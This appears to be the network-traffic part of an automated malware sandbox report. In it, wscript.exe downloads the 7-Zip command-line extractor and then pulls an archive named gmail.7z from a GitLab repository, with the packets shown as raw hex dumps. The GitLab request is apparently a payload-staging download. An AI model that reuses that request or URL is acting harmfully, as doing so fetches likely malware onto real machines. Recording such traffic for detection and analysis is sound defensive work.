Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 4, 2024 08:49:27.724061012 CET	192.168.2.6	1.1.1.1	0x38f9	Standard query (0)	www.7-zip.org	A (IP address)	IN (0x0001)	false
Jan 4, 2024 08:49:30.157171011 CET	192.168.2.6	1.1.1.1	0x66d4	Standard query (0)	gitlab.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 4, 2024 08:49:28.372150898 CET	1.1.1.1	192.168.2.6	0x38f9	No error (0)	www.7-zip.org		49.12.202.237	A (IP address)	IN (0x0001)	false
Jan 4, 2024 08:49:30.252258062 CET	1.1.1.1	192.168.2.6	0x66d4	No error (0)	gitlab.com		172.65.251.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.7-zip.org

gitlab.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49706	49.12.202.237	443	6888	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-04 07:49:28 UTC	326	OUT	GET /a/7zr.exe HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.7-zip.org Connection: Keep-Alive
2024-01-04 07:49:29 UTC	262	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 07:49:29 GMT Content-Type: application/octet-stream Content-Length: 584704 Last-Modified: Tue, 20 Jun 2023 08:00:00 GMT Connection: close ETag: "64915c80-8ec00" Accept-Ranges: bytes
2024-01-04 07:49:29 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 65 73 a4 05 04 1d f7 05 04 1d f7 05 04 1d f7 7e 18 11 f7 07 04 1d f7 6a 1b 16 f7 06 04 1d f7 86 18 13 f7 0d 04 1d f7 6a 1b 17 f7 0e 04 1d f7 6a 1b 19 f7 07 04 1d f7 8b 0c 42 f7 04 04 1d f7 05 04 1c f7 9d 04 1d f7 86 0c 40 f7 0c 04 1d f7 33 22 16 f7 82 04 1d f7 13 7b 19 f6 06 04 1d f7 33 22 17 f7 06 04 1d f7 1e 99 b7 f7 1c 04 1d f7 9d 76 1e f6 01 04 1d f7 c2 02 1b f7 04 04 1d Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$Aes~jjjB@3"{3"v
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 8d 47 01 eb 02 33 c0 5f 5e c3 b8 50 2c 47 00 e8 32 a6 06 00 83 ec 4c 89 4d e0 53 8b 4d 10 33 db 39 59 04 75 15 8d 45 08 68 c0 02 48 00 50 c7 45 08 a0 93 47 00 e8 2c a6 06 00 56 57 89 5d d0 89 5d d4 89 5d d8 8d 55 d0 89 5d fc e8 3b f8 ff ff 8b 45 14 8b 4d d4 8b 55 d0 8b f0 8d 7d f0 c6 45 f3 01 8b 4c 8a fc c6 45 13 01 66 a5 39 59 04 a4 75 0e 80 65 f3 00 8d 4d d0 e8 50 05 00 00 eb 18 8a 40 02 3c 01 74 0d 3c 02 75 0d e8 0c fa ff ff 84 c0 74 04 80 65 13 00 8d 4d c4 e8 f6 e1 ff ff 83 4d e4 ff 83 7d d4 03 8b 1d c4 91 47 00 c6 45 fc 01 72 2e 8b 45 d0 8b 08 83 79 04 00 75 23 8b 48 04 83 79 04 00 75 1a 8b 40 08 68 8c 93 47 00 8b 00 50 ff d3 59 85 c0 59 75 07 c7 45 e4 02 00 00 00 83 7d 08 02 0f 84 be 00 00 00 83 4d e4 ff 8d 4d d0 e8 bc 01 00 00 83 7d 08 01 8b f8 8b Data Ascii: G3_^P,G2LMSM39YuEhHPEG,VW]]]U];EMU}ELEf9YueMP@<t<uteMM}GEr.Eyu#Hyu@hGPYYuE}MM}
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 92 a2 ff ff 66 83 7d e8 5c c6 45 fc 07 74 24 66 83 7d e8 2f 74 1d 8b 4d d0 8d 04 1f 8d 04 41 8d 4d c4 50 e8 03 a6 ff ff 8d 4d c4 56 e8 fa a5 ff ff eb 0c 83 c6 02 8d 4d c4 56 e8 db a3 ff ff 8d 4d c4 e8 35 01 00 00 84 c0 75 04 32 db eb 47 83 7d f0 00 74 0b ff 75 f0 8b 4d ec e8 53 a6 ff ff 57 8d 45 ac 53 50 8d 4d d0 e8 eb 00 00 00 8b 4d ec 50 c6 45 fc 08 e8 fc a5 ff ff c6 45 fc 07 ff 75 ac e8 08 93 ff ff 59 8d 45 c4 8b 4d ec 50 e8 e3 a5 ff ff b3 01 ff 75 c4 e8 f1 92 ff ff 59 ff 75 d0 e8 e8 92 ff ff 59 8a c3 e9 9b 00 00 00 83 c6 04 8d 4d dc 56 e8 1e a2 ff ff 8b 4d dc c7 45 fc 02 00 00 00 e8 0e fb ff ff 8b f0 8b 45 dc 8d 4d b8 8d 3c 36 03 c7 50 e8 fc a1 ff ff 8d 4d b8 c6 45 fc 03 e8 93 00 00 00 84 c0 75 16 ff 75 b8 e8 9a 92 ff ff ff 75 dc e8 92 92 ff ff 59 32 Data Ascii: f}\Et$f}/tMAMPMVMVM5u2G}tuMSWESPMMPEEuYEMPuYuYMVMEEM<6PMEuuuY2
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 00 74 21 49 74 12 49 74 07 b8 01 00 03 80 eb 42 8b 48 20 8b 50 24 eb 06 8b 48 10 8b 50 14 01 4d 0c 11 55 10 8b 55 10 85 d2 7f 10 7c 07 8b 4d 0c 85 c9 73 0a b8 83 00 07 80 eb 17 8b 4d 0c 89 48 10 89 50 14 8b 45 18 85 c0 74 05 89 08 89 50 04 33 c0 5d c2 14 00 b8 fc 32 47 00 e8 e6 25 06 00 51 51 53 56 57 8b da 33 ff 89 4d f0 6a 30 89 3b e8 e6 52 ff ff 3b c7 59 74 10 89 78 04 89 78 08 c7 00 dc 99 47 00 8b f0 eb 02 33 f6 3b f7 89 75 ec 74 06 8b 06 56 ff 50 04 ff 75 f0 8d 4e 08 89 7d fc e8 ea dd ff ff 8b 45 08 8b 4d 0c 89 46 28 89 46 18 8b 45 10 89 4e 2c 89 46 20 8b 45 14 89 4e 1c 89 7e 10 8b ce 89 7e 14 89 46 24 e8 0b ff ff ff 3b c7 89 45 0c 74 13 83 4d fc ff 3b f7 74 06 8b 06 56 ff 50 08 8b 45 0c eb 0e 8b 06 57 57 57 57 56 ff 50 10 89 33 33 c0 8b 4d f4 5f 5e Data Ascii: t!ItItBH P$HPMUU\|MsMHPEtP3]2G%QQSVW3Mj0;R;YtxxG3;utVPuN}EMF(FEN,F EN~~F$;EtM;tVPEWWWWVP33M_^
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 47 00 e8 3b 00 01 00 8d 45 d4 68 28 14 48 00 50 e8 51 e6 05 00 83 fa 01 72 23 77 04 85 ff 72 1d ff 36 8d 4d d4 68 fc 9e 47 00 e8 13 00 01 00 8d 45 d4 68 28 14 48 00 50 e8 29 e6 05 00 52 57 8b cb e8 db 00 00 00 57 ff 15 c8 90 47 00 50 ff 15 9c 90 47 00 85 c0 75 37 ff 15 d8 90 47 00 68 f0 9e 47 00 8b cb 8b f0 e8 47 26 ff ff 8b d6 8d 4d c8 e8 58 4a ff ff 50 8b cb c6 45 fc 02 e8 f5 25 ff ff ff 75 c8 c6 45 fc 01 e8 01 13 ff ff 59 8b cb e8 6e 25 ff ff ff 75 e0 e8 f1 12 ff ff 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 08 00 51 83 64 24 00 00 56 8b f1 6a 00 e8 80 2e ff ff 8b c6 5e 59 c3 b2 01 b9 00 a0 47 00 e8 67 84 ff ff b2 01 b9 c4 9f 47 00 e9 5b 84 ff ff 55 8b ec 51 66 83 39 00 56 8b f2 75 04 32 c0 eb 15 8d 55 fc e8 eb 2e ff ff 8b 4d fc 89 06 33 c0 66 39 Data Ascii: G;Eh(HPQr#wr6MhGEh(HP)RWWGPGu7GhGG&MXJPE%uEYn%uYM_^[dQd$Vj.^YGgG[UQf9Vu2U.M3f9
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 8b d8 85 db 74 19 ff 75 d8 e8 81 d3 fe ff ff 75 cc e8 79 d3 fe ff 59 8b c3 59 e9 e6 03 00 00 80 7d 0b 00 74 10 80 3f 00 8b ce 0f 94 c0 88 46 39 e8 0a 13 00 00 8b 45 0c 80 20 00 e9 af 03 00 00 39 9e c0 01 00 00 74 67 80 be b0 00 00 00 00 75 5e 80 be b2 00 00 00 00 75 55 8b 55 e8 8b 4d ec 8d 45 f2 50 8d 45 bc 50 e8 a7 e2 ff ff 3b c3 0f 85 34 ff ff ff 80 7d f2 00 74 34 ff b6 c0 01 00 00 8d 8e bc 01 00 00 8d 45 bc 53 50 e8 fb 1c 00 00 83 f8 ff 74 19 8b 8e c8 01 00 00 8b 3c 81 39 5f 04 75 29 8d 45 d8 8b cf 50 e8 cf e3 fe ff 6a 20 e8 a5 d2 fe ff 59 89 45 ec 3b c3 c6 45 fc 05 74 64 8b c8 e8 24 9c ff ff 8b f8 eb 5b 8b 17 8b 4d d8 e8 cc 0d ff ff 84 c0 75 25 e8 c2 26 ff ff 8d 4d d8 57 51 8b ce ff 35 a0 a3 47 00 50 e8 a1 ef ff ff 3b c3 0f 84 f4 02 00 00 e9 a9 fe ff Data Ascii: tuuyYY}t?F9E 9tgu^uUUMEPEP;4}t4ESPt<9_u)EPj YE;Etd$[Mu%&MWQ5GP;
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 33 c0 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 8b 45 e8 c6 45 fc 01 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 8b 45 dc eb ba 8b 45 e8 c6 45 fc 01 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 8b 45 dc eb 83 3b d3 c6 45 fc 01 74 09 8b 45 e8 50 8b 08 ff 51 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 b8 05 40 00 80 e9 47 ff ff ff 56 8b f1 57 8b 7c 24 0c ff 76 68 8d 4e 6c 8b 07 51 57 ff 50 0c 85 c0 75 0f 8b 07 81 c6 8c 00 00 00 6a Data Ascii: E];tPQEM;tPQ3M_^[dEE;tPQE];tPQEM;tPQEEE;tPQE];tPQEM;tPQE;EtEPQE];tPQEM;tPQ@GVW\|$vhNlQWPuj
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: aa cd ff ff 8b b5 f0 fe ff ff ff 45 08 83 45 bc 10 8b 45 08 83 c6 08 3b 45 c4 89 b5 f0 fe ff ff 0f 82 e2 fc ff ff 8b 03 8b cb ff 50 04 83 85 74 ff ff ff 01 83 95 78 ff ff ff 00 ff 85 7c ff ff ff 8b 85 7c ff ff ff 3b 45 0c 0f 82 8b fc ff ff 33 c0 3b 85 0c ff ff ff 0f 87 9a 00 00 00 72 0f 8b 45 94 3b 85 08 ff ff ff 0f 83 89 00 00 00 ff 45 e8 33 ff e9 2b fc ff ff 8b f0 e9 25 01 00 00 ff 75 10 e8 07 53 fe ff ff 75 cc e8 ff 52 fe ff ff 75 c0 e8 f7 52 fe ff ff b5 e4 fe ff ff e8 ec 52 fe ff 8b 4d d0 83 c4 10 e8 58 e7 03 00 e9 35 f7 ff ff 8d 8d d4 fe ff ff e8 5a c7 fe ff 8d 8d 94 fe ff ff c6 45 fc 18 e8 e1 cc ff ff ff 75 10 e8 ba 52 fe ff ff 75 cc e8 b2 52 fe ff ff 75 c0 e8 aa 52 fe ff ff b5 e4 fe ff ff e8 9f 52 fe ff 83 c4 10 e9 db 00 00 00 8b 85 74 ff ff ff 0b Data Ascii: EEE;EPtx\|\|;E3;rE;E3+%uSuRuRRMX5ZEuRuRuRRt
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 33 ed 8b d9 39 6f 04 76 35 56 8b 07 8b 34 a8 80 7e 0c 00 75 22 83 7e 04 01 75 1c 83 7b 04 00 75 0b 8b ce e8 73 f1 ff ff 84 c0 75 0b 8b 06 8b cb 8b 10 e8 07 ff ff ff 45 3b 6f 04 72 cd 5e 5f 5d 5b c3 b8 0c 48 47 00 e8 fa e5 04 00 51 56 8b f1 89 75 f0 e8 3e 22 fe ff ff 75 08 83 65 fc 00 8b ce e8 4d 26 fe ff 83 7d 0c 00 74 11 8b ce e8 91 25 fe ff ff 75 0c 8b ce e8 ae 25 fe ff 8b 4d f4 8b c6 5e 64 89 0d 00 00 00 00 c9 c2 08 00 b8 20 48 47 00 e8 ae e5 04 00 51 56 8b f1 89 75 f0 e8 f2 21 fe ff ff 75 08 83 65 fc 00 8b ce e8 79 25 fe ff 83 7d 0c 00 74 11 8b ce e8 45 25 fe ff ff 75 0c 8b ce e8 62 25 fe ff 8b 4d f4 8b c6 5e 64 89 0d 00 00 00 00 c9 c2 08 00 53 8b 5c 24 08 56 57 8b f9 8b 07 8b 34 98 85 f6 74 0e 8b ce e8 0e 01 00 00 56 e8 96 12 fe ff 59 53 8b cf e8 71 Data Ascii: 39ov5V4~u"~u{usuE;or^_][HGQVu>"ueM&}t%u%M^d HGQVu!uey%}tE%ub%M^dS\$VW4tVYSq
2024-01-04 07:49:29 UTC	16384	IN	Data Raw: 5f f8 ff ff e8 ee ac fe ff 8d 4d d4 8b f0 c6 45 fc 08 e8 7e a7 01 00 8b 4d ec e8 e7 67 03 00 8d 4d e8 c6 45 fc 02 e8 6a a7 01 00 8d 4d b8 c6 45 fc 01 e8 53 d0 00 00 80 65 fc 00 8d 8d 20 ff ff ff e8 8a e6 ff ff 8b c6 e9 b6 f7 ff ff b8 f8 42 42 00 c3 8b 44 24 04 53 56 57 83 f8 08 8b f9 77 1f 33 f6 85 c0 76 11 8d 54 02 ff 8a 0c 3e 3a 0a 75 27 46 4a 3b f0 72 f3 b0 01 5f 5e 5b c2 04 00 33 db 85 c0 76 f2 8b f7 2b f2 8a 0c 16 3a 0a 75 08 43 42 3b d8 72 f3 eb df 32 c0 eb dd b8 c0 4c 47 00 e8 9f a5 04 00 83 ec 20 56 57 83 fa 20 8b f9 75 07 be 68 af 47 00 eb 2e 83 fa 14 75 07 be 48 af 47 00 eb 22 83 fa 10 75 07 be 44 af 47 00 eb 16 83 fa 08 75 07 be 34 af 47 00 eb 0a 83 fa 04 75 5b be 08 ad 47 00 53 56 8d 4d e0 e8 0f db fd ff 83 65 fc 00 8d 55 ec 8b c8 e8 44 5a fe Data Ascii: _ME~MgMEjMESe BBD$SVWw3vT>:u'FJ;r_^[3v+:uCB;r2LG VW uhG.uHG"uDGu4Gu[GSVMeUDZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49707	172.65.251.78	443	6888	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-04 07:49:30 UTC	359	OUT	GET /cv4500942/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: gitlab.com Connection: Keep-Alive
2024-01-04 07:49:30 UTC	331	IN	HTTP/1.1 200 OK Date: Thu, 04 Jan 2024 07:49:30 GMT Content-Type: application/octet-stream Content-Length: 1960640 Connection: close cache-control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60 content-disposition: attachment; filename="gmail.7z"; filename*=UTF-8''gmail.7z
2024-01-04 07:49:30 UTC	2225	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
2024-01-04 07:49:30 UTC	567	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 73 4d 30 69 6a 5a 38 36 7a 53 71 67 58 6b 51 65 67 41 59 4a 77 76 51 31 64 50 72 47 56 66 49 51 53 36 46 71 70 49 38 35 6e 51 4b 68 47 76 39 50 6b 56 36 74 36 71 45 38 76 38 7a 5a 48 6a 6a 57 51 44 70 78 63 52 6c 6c 46 4a 6c 71 79 65 64 78 55 37 66 50 66 54 56 64 33 33 6a 78 76 67 4b 64 51 65 48 6e 48 31 4e 25 32 42 62 4d 78 58 43 4b 4e 77 59 72 53 6b 79 25 32 42 69 64 78 42 49 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sM0ijZ86zSqgXkQegAYJwvQ1dPrGVfIQS6FqpI85nQKhGv9PkV6t6qE8v8zZHjjWQDpxcRllFJlqyedxU7fPfTVd33jxvgKdQeHnH1N%2BbMxXCKNwYrSky%2BidxBI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: 37 7a bc af 27 1c 00 04 a7 b9 75 65 60 ea 1d 00 00 00 00 00 40 00 00 00 00 00 00 00 ba 2f 79 c0 95 2f 10 97 5c 23 ab 7c db 6f d9 3c c5 6a 0e a7 83 4d d4 c7 4b ce 79 da a8 04 26 d8 16 78 a3 78 9b 9d c1 af 82 b5 7c 56 eb f2 04 c1 f6 36 44 a8 01 d6 6d 40 57 5b ba 0b 8e 91 b4 da da 9e 7e 6e cf fc 9a 8e 11 53 01 f2 48 74 21 99 6d 7c 63 c9 eb 06 33 13 71 bc 63 ae a8 c4 02 16 d0 fc a4 5e a6 00 51 fc c9 11 d9 77 67 36 a6 d4 3b 71 ee 8b 76 6f 15 68 bb 57 93 aa 2f 20 e8 54 b6 28 92 76 09 1d f7 29 eb 47 0c 8b 11 97 4e fe ef 13 04 5e 85 50 be 71 1f a5 d7 45 50 19 5a 27 60 37 32 66 90 c8 4a 02 9d c4 24 8f 2a 91 1b da 77 dc 02 04 b1 a3 1f 05 3d f4 86 2c 0f 1c 0b 49 18 3e 36 6c ec 0e 24 5f b0 19 15 cb 8c f9 e2 aa fe 34 c6 55 e9 64 4f 8c 70 a1 38 33 3d e2 d4 cf 64 a5 4d Data Ascii: 7z'ue`@/y/\#\|o<jMKy&xx\|V6Dm@W[~nSHt!m\|c3qc^Qwg6;qvohW/ T(v)GN^PqEPZ'`72fJ$*w=,I>6l$_4UdOp83=dM
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: 71 c6 4f 34 50 b0 38 8d 28 99 b3 10 0c 5f e0 0d 87 76 d1 0e bb c9 4b 73 5c 42 df 38 85 14 c3 0d 72 74 73 66 fc 7f 25 64 b5 8a 1e 04 e7 c9 56 7b c8 cd be cb dd ba 1e a8 fa 87 3a 3b 9a d6 c3 fe 7f 38 29 11 dd a5 5d 7b d4 2e fa 2b b0 b0 7e 98 54 a3 d5 ee e2 6d 3a a0 a3 50 8f 5b a1 b1 21 37 56 28 58 58 21 25 2d 4a 25 4a fb bf 51 1d af aa 08 f3 7d 12 16 54 1d 9f 18 bb 28 bd af 0e dc 80 a6 7b ca 9d 1a 2e 74 d0 cd eb 3e 0b df 58 85 08 6c 61 5d 77 45 d8 27 28 91 0e f9 6c 3e 38 dd d0 89 6e 65 b3 31 e6 20 1f c6 29 50 3b ff bd 4c 55 fe d0 02 5f d1 7d 8b 57 e2 3a 49 00 cf 67 94 b1 d5 0e b1 3e a1 3d 79 8c 82 30 c8 f3 5b c7 3d 32 db e3 ba 89 28 d9 6e 97 41 69 92 88 20 3a 95 cb 8e fc 2b 9c 9f 07 eb a1 7e f0 54 0a 8d 55 92 20 f2 47 93 1e 3d 5c f9 3f 43 7c 33 dd b5 92 e4 Data Ascii: qO4P8(_vKs\B8rtsf%dV{:;8)]{.+~Tm:P[!7V(XX!%-J%JQ}T({.t>Xla]wE'(l>8ne1 )P;LU_}W:Ig>=y0[=2(nAi :+~TU G=\?C\|3
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: c0 9f bb d4 58 c9 83 39 17 d7 f1 5e 8f 03 4c 28 7f cf de 5f e3 c0 75 1a 00 c1 e2 40 46 bb df 5b fe db b3 61 c8 42 61 22 a2 9c 60 d2 3b 03 c4 c8 41 f2 a1 5b 94 aa cc e2 c2 99 1c 6f df 25 ee 84 e5 12 58 98 4e c9 4c b2 e1 a4 90 8e cc 13 a8 da 64 45 6c 74 f7 61 03 a4 19 ec 24 1e 69 f9 35 78 d2 dd c0 17 68 02 7f 47 db 49 b8 52 7f 28 9e f9 ec 31 53 d1 99 f1 3b 4a 56 24 61 6e c0 52 c6 69 49 16 4d 52 18 4c 49 1f 28 49 f0 7c 52 dc 3d f8 5f 59 44 c1 b7 7d 05 48 42 4a f4 81 85 e5 59 45 b0 fd 28 70 a4 66 ff 40 a3 b6 99 68 8c 18 14 cc 7a ec 31 64 e8 ee fb 61 ee 19 17 c8 c8 2c 04 41 32 4c d0 8f 34 33 5e 55 27 29 49 6a 8e 2d 20 54 4d 70 ba 17 b7 11 92 f7 2b 0e f8 4d 44 38 54 a4 3b 50 8f d7 d8 98 63 ec 9a 55 39 ac df 89 20 5d a0 d9 1f 05 98 f6 30 6d 73 bc 66 bb 22 29 53 Data Ascii: X9^L(_u@F[aBa"`;A[o%XNLdElta$i5xhGIR(1S;JV$anRiIMRLI(I\|R=_YD}HBJYE(pf@hz1da,A2L43^U')Ij- TMp+MD8T;PcU9 ]0msf")S
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: b3 08 8a 28 97 e5 1e 24 d4 32 96 a6 19 99 48 dd 4a e3 d4 79 b7 4d e5 ba 25 b3 e5 c3 45 ca ca 99 36 d8 47 05 52 b7 77 26 3f 0d c8 5f a8 0d 38 c0 b4 86 b0 9b f1 f3 3a 27 66 ca dd 28 f2 21 c0 0e 15 98 b6 47 74 4f 7b ba d0 d0 b7 b4 01 d4 03 17 af c3 72 0b 91 61 36 4b d9 06 bb 3c 6c eb 3a 01 28 63 bb c8 79 0f 00 80 f1 b4 9d 36 31 fb 55 b9 ae 52 ee 26 1c b0 66 28 61 b1 b1 af b1 9e 12 71 95 db f9 88 be 28 53 4f 67 2f e3 21 8e b5 89 fc ae 94 b5 7d f3 53 18 c8 69 22 7b 27 1a 55 7c f5 e5 da d8 6f f8 8e 76 ae 29 ae a1 48 88 e5 8c e8 ab b5 83 d5 2e d4 2f 24 af d2 86 99 41 1d 2b be d0 8a 2a 5c 6c 29 d6 d0 44 7f 6b 8c 62 ba 42 7c 58 5b 62 b9 3b c8 fb 66 78 39 1d bc e4 7b 24 1f d7 0d 5b ad bf 44 26 6e 3f dc 19 ee b5 8c 94 99 2b 4e c5 12 06 b2 6f 62 c9 d5 32 55 65 20 60 Data Ascii: ($2HJyM%E6GRw&?_8:'f(!GtO{ra6K<l:(cy61UR&f(aq(SOg/!}Si"{'U\|ov)H./$A+*\l)DkbB\|X[b;fx9{$[D&n?+Nob2Ue `
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: d2 8e 0c 2d 8f 1d 07 78 d2 a8 07 2e 0c 11 7a 70 f4 c0 cb a6 79 94 c1 f1 ae 75 49 2e 19 a2 6a cc 18 f3 2c 1b 68 b7 3e c0 fd ec c5 96 bc 75 a4 c3 e7 31 85 da b5 f5 ab 62 f1 34 05 6a 46 d7 78 f0 d2 d7 39 16 33 38 14 8b 0d 38 b7 fe 7c 6d d8 a2 71 fe 2b 6b 01 b9 08 94 7a ec 90 bc cd 73 4c f1 51 77 08 e4 1e 7c d8 52 04 b9 4a a1 5c 8a ff df 3a 56 f8 63 53 64 b7 93 5a 9d 7a 43 8b de 6b 7c a6 b4 49 97 60 5c 4d f7 f4 35 a5 ef 3d 69 9b 3a fe cd 15 fc 7d 75 74 13 3c 1a a7 1b f3 ad e8 72 3e b9 e9 f6 34 93 a8 6b 1f 53 92 d5 a5 30 aa 30 46 2f fc 5a cf 0c 01 c0 b5 04 aa c1 1e ca 6f 16 e4 a9 7c 81 ab 09 30 29 15 59 96 23 8b 7c 73 61 61 af 0e 8a 04 94 06 d6 68 ae 7d e1 44 4d 89 13 e4 12 c4 f7 3c 11 d1 ec 29 f2 e8 dd d2 13 39 cb 16 9f e3 e5 8d 12 d2 fb 96 5f 10 f1 1e d0 56 Data Ascii: -x.zpyuI.j,h>u1b4jFx9388\|mq+kzsLQw\|RJ\:VcSdZzCk\|I`\M5=i:}ut<r>4kS00F/Zo\|0)Y#\|saah}DM<)9_V
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: 68 dc ae cb f7 dc 7a 2a 00 db 90 0b 0d f4 8d 83 48 bc 90 97 39 41 a9 cc 7d b4 2b fd a5 ed 64 32 54 c2 05 b6 85 c6 6f df 5a 7a 83 11 32 7a 69 28 2a 9a e4 98 68 d0 99 96 1a bd 29 a6 31 d0 51 c3 ad b8 b5 d7 6e 4c 1c 41 ab 2a ca 3f c2 ad 34 5c f3 45 d8 dc ad f5 02 cf 81 b1 5b 27 59 9b ce 7c ec 07 8b 61 f2 93 b8 a1 45 93 16 f7 34 37 93 f7 16 11 d6 5e c1 7c a2 84 e2 18 69 56 1e c6 8e 61 74 2d 04 2b 23 cc b8 89 21 18 48 2e 2f 0a a8 d2 1e 4e 90 11 f7 54 c5 31 1d 8d 24 45 64 ce f8 b7 8e 5d 9b 7f 5b dc b2 79 f2 f4 b1 a6 ad ec 7d d3 8d b2 02 5a 8b 5b 51 22 5f f3 84 7a 56 4e 64 31 5d ee 34 ab c8 c1 93 91 58 bb 8d 93 1b 1c 07 35 a4 74 07 77 e3 cf 16 aa 35 88 f8 43 b2 bf f0 6f 79 4b 0e fc ad 3e e8 27 a7 26 bb 5b df 7b 10 1b 8b bc 88 d5 ef 4b fb 6e 97 39 f9 e2 03 b9 d0 Data Ascii: hzH9A}+d2ToZz2zi(h)1QnLA*?4\E['Y\|aE47^\|iVat-+#!H./NT1$Ed][y}Z[Q"_zVNd1]4X5tw5CoyK>'&[{Kn9
